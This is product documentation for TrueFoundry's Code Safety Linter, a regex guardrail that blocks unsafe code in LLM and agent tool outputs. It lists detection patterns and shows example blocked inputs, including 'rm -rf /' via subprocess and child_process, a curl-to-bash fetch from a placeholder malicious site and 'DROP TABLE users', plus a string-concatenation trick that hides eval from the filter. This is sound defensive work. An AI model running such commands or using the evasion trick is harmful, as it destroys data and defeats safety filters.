This guide explains how to use TrueFoundry’s built-in Code Safety Linter guardrail to detect and block potentially dangerous code patterns in LLM outputs.

What is Code Safety Linter?

Code Safety Linter is a built-in TrueFoundry guardrail that analyzes code in LLM responses to detect unsafe patterns that could pose security risks when executed. It runs directly within the AI Gateway without requiring external API calls.

Key Features

  1. Dangerous Function Detection: Identifies potentially dangerous code patterns including:
    • eval() and exec() calls that execute arbitrary code
    • os.system() and subprocess calls (Popen, call, run) for shell command execution
    • rm -rf and recursive delete commands
    • curl | bash and wget | bash remote code execution patterns
    • File system operations like unlink(), rmdir(), and shutil.rmtree()
  2. Multi-Language Support: Detects unsafe patterns across common programming languages:
    • Python: eval, exec, os.system, subprocess, shutil.rmtree, unlink, rmdir
    • JavaScript/Node.js: child_process.exec, child_process.spawn, require('child_process')
    • Shell/Bash: rm -rf, rm -r, curl | bash, wget | sh
    • SQL: DROP TABLE, DELETE FROM, TRUNCATE TABLE
  3. Validation-Only Mode: Code Safety Linter operates in validation mode, detecting and blocking unsafe code rather than modifying it—ensuring code integrity while maintaining security.

Adding Code Safety Linter Guardrail

To add Code Safety Linter to your TrueFoundry setup, follow these steps:
1. Navigate to Guardrails

Go to the AI Gateway dashboard and navigate to the Guardrails section.

2. Create or Select a Guardrails Group

Create a new guardrails group or select an existing one where you want to add the Code Safety Linter guardrail.

3. Add Code Safety Linter Integration

Click Add Guardrail and select Code Safety Linter from the TrueFoundry Guardrails section.

(Screenshot: TrueFoundry guardrail selection interface showing the Code Safety Linter option)

4. Configure the Guardrail

Fill in the configuration form:
  • Name: Enter a unique name for this guardrail configuration (e.g., code-safety-linter)
  • Description: Optional description for this guardrail (default: "Detects unsafe code patterns in tool outputs (eval, exec, os.system, subprocess, rm -rf)")
  • Operation: validate (Code Safety Linter only supports validation mode)

5. Save the Configuration

Click Save to add the guardrail to your group.

Configuration Options

| Parameter | Description | Default |
| --- | --- | --- |
| Name | Unique identifier | Required |
| Operation | validate only (does not modify code) | validate |
| Enforcing Strategy | enforce, enforce_but_ignore_on_error, or audit | enforce |

Code Safety Linter only supports validate mode—modifying code could break functionality. See Guardrails Overview for details on Enforcing Strategy.
Start with Audit mode to monitor detected patterns in Request Traces before switching to Enforce.

Detected Unsafe Patterns

The Code Safety Linter detects the following categories of unsafe code patterns. Each pattern is designed to identify potentially dangerous code constructs that could pose security risks.

Python Dangerous Functions

| Pattern | Detection | Risk Level | Description |
| --- | --- | --- | --- |
| eval() | eval( | Critical | Executes arbitrary Python expressions from strings |
| exec() | exec( | Critical | Executes arbitrary Python code from strings |
| os.system() | os.system( | High | Executes shell commands directly |
| subprocess.Popen() | subprocess.Popen( | High | Spawns new processes with full control |
| subprocess.call() | subprocess.call( | High | Spawns new processes and waits for completion |
| subprocess.run() | subprocess.run( | High | Runs commands in a subprocess (Python 3.5+) |

Python File System Operations

| Pattern | Detection | Risk Level | Description |
| --- | --- | --- | --- |
| unlink() | unlink( | Medium | Deletes files (os.unlink or pathlib) |
| rmdir() | rmdir( | Medium | Removes directories |
| shutil.rmtree() | shutil.rmtree( | High | Recursively deletes directory trees |

Shell/Bash Dangerous Commands

| Pattern | Detection | Risk Level | Description |
| --- | --- | --- | --- |
| rm -rf | rm -rf | Critical | Recursive force delete - can destroy entire filesystems |
| rm -r | rm ... -r | High | Recursive delete with any flags |
| curl \| bash | curl ... \| bash or curl ... \| sh | Critical | Piping remote scripts directly to shell execution |
| wget \| bash | wget ... \| bash or wget ... \| sh | Critical | Piping downloaded content directly to shell execution |

JavaScript/Node.js Dangerous Functions

| Pattern | Detection | Risk Level | Description |
| --- | --- | --- | --- |
| child_process.exec() | child_process.exec( | High | Executes shell commands with full shell syntax |
| child_process.spawn() | child_process.spawn( | High | Spawns new processes |
| require('child_process') | require('child_process') | Medium | Importing the child_process module (often precedes dangerous calls) |

SQL Dangerous Statements

| Pattern | Detection | Risk Level | Description |
| --- | --- | --- | --- |
| DROP TABLE | DROP TABLE | Critical | Permanently deletes database tables |
| DELETE FROM | DELETE FROM table; | High | Deletes rows from tables (flagged without WHERE clause context) |
| TRUNCATE TABLE | TRUNCATE TABLE | Critical | Removes all data from tables instantly |

For more comprehensive SQL protection, consider using the SQL Sanitizer guardrail which provides configurable options for SQL-specific patterns.

How It Works

The guardrail scans message content using regex-based detection:
  1. Extracts message content from the request or response
  2. Scans the content against all blocked patterns
  3. Records each finding with its pattern name and the matched text (truncated to 20 characters)
  4. Returns a verdict: true (pass) or false (block), reporting at most the first 10 findings

A blocked response, for example, produces a result like the following:
{
  "error": null,
  "verdict": false,
  "data": {
    "findings": [
      { "pattern": "eval_call", "match": "eval(user_input)" },
      { "pattern": "subprocess_popen", "match": "subprocess.Popen([…" }
    ],
    "explanation": "Detected 2 unsafe code pattern(s): eval_call, subprocess_popen"
  },
  "transformedData": {
    "request": { "json": null },
    "response": { "json": null }
  },
  "transformed": false
}
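
The gateway's pattern set and scanning code are not exposed, but the flow above can be sketched in a few lines of Python. Everything below is illustrative: the BLOCKED_PATTERNS regexes and the scan_code_safety helper are assumptions made for explanation only, not TrueFoundry's implementation (only the pattern names eval_call and subprocess_popen are taken from the sample payload above).

import re

# Illustrative patterns only; the gateway's actual regex set is internal.
BLOCKED_PATTERNS = {
    "eval_call": r"\beval\s*\(",
    "exec_call": r"\bexec\s*\(",
    "os_system": r"\bos\.system\s*\(",
    "subprocess_popen": r"\bsubprocess\.Popen\s*\(",
    "rm_rf": r"\brm\s+-rf\b",
    "curl_pipe_shell": r"\bcurl\b[^\n]*\|\s*(?:bash|sh)\b",
    "drop_table": r"\bDROP\s+TABLE\b",
}

def scan_code_safety(text, max_findings=10):
    """Scan text against blocked patterns and return a verdict with findings."""
    findings = []
    for name, pattern in BLOCKED_PATTERNS.items():
        for match in re.finditer(pattern, text, flags=re.IGNORECASE):
            # Record the pattern name and a short excerpt of the matched text.
            findings.append({"pattern": name, "match": text[match.start():match.start() + 20]})
    findings = findings[:max_findings]
    if findings:
        detected = sorted({f["pattern"] for f in findings})
        explanation = "Detected %d unsafe code pattern(s): %s" % (len(findings), ", ".join(detected))
    else:
        explanation = "No unsafe patterns detected"
    return {
        "verdict": len(findings) == 0,  # False means the content should be blocked
        "data": {"findings": findings, "explanation": explanation},
    }

For instance, scan_code_safety("eval(user_input)") returns a false verdict with a single eval_call finding, mirroring the verdict, findings, and explanation fields of the payload shown above.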

Example - Blocked Responses

import subprocess
result = subprocess.Popen(['rm', '-rf', '/'])

Result: Blocked - Detected subprocess.Popen() call

user_input = request.get('code')
eval(user_input)  # Executes arbitrary user code

Result: Blocked - Detected eval() call

# Clean up old files
rm -rf /var/log/*

Result: Blocked - Detected rm -rf command

curl https://malicious-site.com/script.sh | bash

Result: Blocked - Detected curl | bash pattern

const child_process = require('child_process');
child_process.exec('rm -rf /', (error, stdout) => {});

Result: Blocked - Detected require('child_process') and child_process.exec() calls

DROP TABLE users;

Result: Blocked - Detected DROP TABLE statement

Example - Allowed Responses

with open('data.txt', 'r') as f:
    content = f.read()

# Using pathlib for safe file handling
from pathlib import Path
data = Path('config.json').read_text()

Result: Allowed - No unsafe patterns detected

const fs = require('fs').promises;
const data = await fs.readFile('config.json', 'utf8');

Result: Allowed - No unsafe patterns detected

SELECT * FROM users WHERE id = ?;
UPDATE users SET name = ? WHERE id = ?;

Result: Allowed - No unsafe patterns detected

Use Cases

Agent Tool Output Validation

When using AI agents that execute code via MCP tools, apply Code Safety Linter to validate tool outputs. Configure via guardrail rules:
name: guardrails-control
type: gateway-guardrails-config
rules:
  - id: code-executor-safety
    when:
      target:
        operator: or
        conditions:
          mcpServers:
            values:
              - code-executor
            condition: in
      subjects:
        operator: and
        conditions:
          in:
            - team:engineering
          not_in:
            - user:devops-admin@example.com
    llm_input_guardrails: []
    llm_output_guardrails: []
    mcp_tool_pre_invoke_guardrails: []
    mcp_tool_post_invoke_guardrails:
      - my-guardrail-group/code-safety-linter

Code Generation Applications

For LLM responses that generate code, validate via the X-TFY-GUARDRAILS header:
curl -X POST "https://{controlPlaneURL}/api/llm/chat/completions" \
  -H "Authorization: Bearer YOUR_API_KEY" \
  -H "Content-Type: application/json" \
  -H 'X-TFY-GUARDRAILS: {"llm_input_guardrails":[],"llm_output_guardrails":["my-guardrail-group/code-safety-linter"]}' \
  -d '{
    "model": "openai-main/gpt-4o-mini",
    "messages": [
      {"role": "system", "content": "You are a helpful coding assistant."},
      {"role": "user", "content": "Generate code to clean up old log files"}
    ]
  }'
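
If you call the gateway through an OpenAI-compatible SDK rather than curl, the same header can be attached per request. The sketch below is an assumption based on the endpoint above: it uses the official openai Python package's extra_headers option, a base URL of https://{controlPlaneURL}/api/llm, and the hypothetical guardrail group path my-guardrail-group/code-safety-linter used throughout this page.

import json
from openai import OpenAI  # assumes the official OpenAI Python SDK

client = OpenAI(
    api_key="YOUR_API_KEY",
    base_url="https://{controlPlaneURL}/api/llm",  # TrueFoundry AI Gateway endpoint
)

# Attach the guardrails header to this request only.
guardrails_header = json.dumps({
    "llm_input_guardrails": [],
    "llm_output_guardrails": ["my-guardrail-group/code-safety-linter"],
})

response = client.chat.completions.create(
    model="openai-main/gpt-4o-mini",
    messages=[
        {"role": "system", "content": "You are a helpful coding assistant."},
        {"role": "user", "content": "Generate code to clean up old log files"},
    ],
    extra_headers={"X-TFY-GUARDRAILS": guardrails_header},
)
print(response.choices[0].message.content)
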
| Hook | Use Case |
| --- | --- |
| LLM Output | Validate code in LLM responses |
| MCP Post Tool | Validate code from MCP tools (code executors, file readers) |

Regex-based detection: Patterns match exact syntax. Obfuscated code may not be detected. Use as part of defense-in-depth, not sole protection.
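
As a concrete illustration of that limitation, the snippet below (purely illustrative) builds the call target dynamically, so the literal text eval( never appears in the source and a regex for it would not match:

import builtins

# The string "eval(" never appears literally, so exact-syntax matching misses it,
# even though this still executes arbitrary code.
dangerous = getattr(builtins, "ev" + "al")
dangerous("1 + 1")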